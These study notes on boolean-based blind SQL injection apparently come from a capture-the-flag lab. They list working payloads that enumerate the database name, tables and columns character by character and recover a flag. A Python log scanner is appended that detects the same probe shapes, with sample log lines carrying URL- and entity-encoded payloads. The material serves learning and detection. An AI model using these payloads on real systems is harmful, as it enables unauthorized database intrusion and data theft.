
SQL blind injection study notes

information_schema.schemata(schema_name)
information_schema.tables(table_name,table_schema)
information_schema.columns(column_name,table_name)

Blind injection and PoC writing: https://bbs.ichunqiu.com/thread-31587-1-1.html

SQL injection based on boolean/error feedback:
Understanding nested SQL statements and common SQL functions: http://blog.51cto.com/bxbx258/106008
Character sets in MySQL and common character-encoding bypasses:
ascii(): http://tool.oschina.net/commons?type=4


On the front end: HTML entity encoding: &#xx, JS: \uxx, URL: %xx [0-255]
In PHP and MySQL: a hexadecimal string can be injected: \uxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Guess the database name: first its character length, then each character
-1' or length(database())=10#    (actual length: 8)
-1' or left(database(),1)>'m'#

abcdef ghijklm nopqr stuvwxyz    (alphabet split points for narrowing down a character by comparison)

admin' or left(database(),2)>'we'#    (use > or = as needed)
admin' or left(database(),8)='web_test'#

Guess the tables in the database:
admin' or length(select table_name from information_schema.tables where table_schema='web_test' limit 0,1)>10#

admin' or length((select table_name from information_schema.tables where table_schema='web_test' limit 0,1))=4#    (result: user; note that the subquery must be wrapped in two sets of parentheses)

admin' or ascii(substr((select table_name from information_schema.tables where table_schema='web_test' limit 0,1),1,1))=117#
admin' or substr((select table_name from information_schema.tables where table_schema='web_test' limit 0,1),1,4)='USER'#
Target table: web_test.flag
Guess the columns
admin' or (select count(column_name) from information_schema.columns where table_name='flag')>10#    (guess the count)

admin' or length((select column_name from information_schema.columns where table_name='flag'))>5#    (guess the length; it is 4)
admin' or substr((select column_name from information_schema.columns where table_name='flag'),1,4)='flag'#

admin' or ascii(substr((select flag from web_test.flag),1,1))>32#
flag{8o5_1s_th3_b3st_c1ass}
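As an added defender-side example (not part of the original notes), the following Python scans web access-log lines for the boolean-blind probe shapes used above (information_schema lookups, length()/left()/substr()/ascii() right after an OR, bare database() calls) after undoing the URL and HTML-entity encodings the notes list, and reports clients that send many such requests. The log lines, IPs and paths are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Shapes of the boolean-blind probes in the notes above: information_schema lookups, and
# length()/left()/substr()/ascii() applied right after an OR/AND, or a bare database()/user() call.
PROBE_PATTERNS = [
    re.compile(r"information_schema\.(?:schemata|tables|columns)", re.I),
    re.compile(r"\b(?:or|and)\b\s*\(*\s*(?:length|left|substr|substring|ascii)\s*\(", re.I),
    re.compile(r"\b(?:database|version|user)\s*\(\s*\)", re.I),
]
# Common/combined access-log layout; only the client IP and request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_entities(value):
    """Undo the HTML numeric entities (&#NN; / &#xHH;) listed above; %xx and + were undone by parse_qsl."""
    value = re.sub(r"&#x([0-9a-f]+);?", lambda m: chr(int(m.group(1), 16)), value, flags=re.I)
    return re.sub(r"&#(\d+);?", lambda m: chr(int(m.group(1))), value)

def is_blind_probe(param_value):
    """True when a decoded parameter value looks like one of the probes above."""
    decoded = decode_entities(param_value)
    return any(p.search(decoded) for p in PROBE_PATTERNS)

def scan_log(lines, min_hits=3):
    """Count probe-like requests per client; blind extraction needs many near-identical
    requests, so only clients with at least min_hits are reported."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected layout
        query = urlsplit(m.group("target")).query
        if any(is_blind_probe(v) for _, v in parse_qsl(query, keep_blank_values=True)):
            hits[m.group("ip")] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}

# Constructed sample log (hypothetical IPs and paths, not from the original notes).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2023:13:55:36 +0000] "GET /login.php?user=alice&pass=s3cret HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?q=dogs+or+cats HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /login.php?user=admin%27+or+length%28database%28%29%29%3D8%23&pass=x HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /login.php?user=admin%27+or+left%28database%28%29%2C1%29%3E%27m%27%23&pass=x HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:56:03 +0000] "GET /login.php?user=admin%27+or+ascii%28substr%28%28select+table_name+from+information_schema.tables+where+table_schema%3D%27web_test%27+limit+0%2C1%29%2C1%2C1%29%29%3D117%23&pass=x HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:56:04 +0000] "GET /login.php?user=admin%27%26%2332%3Bor%26%2332%3Blength%28database%28%29%29%3D8%23&pass=x HTTP/1.1" 200 512',
]
```

Standard access logs carry only the query string, so POST bodies need a separate source (application logs or a WAF), and the threshold exists because one hit can be a false positive while character-by-character extraction produces hundreds of requests.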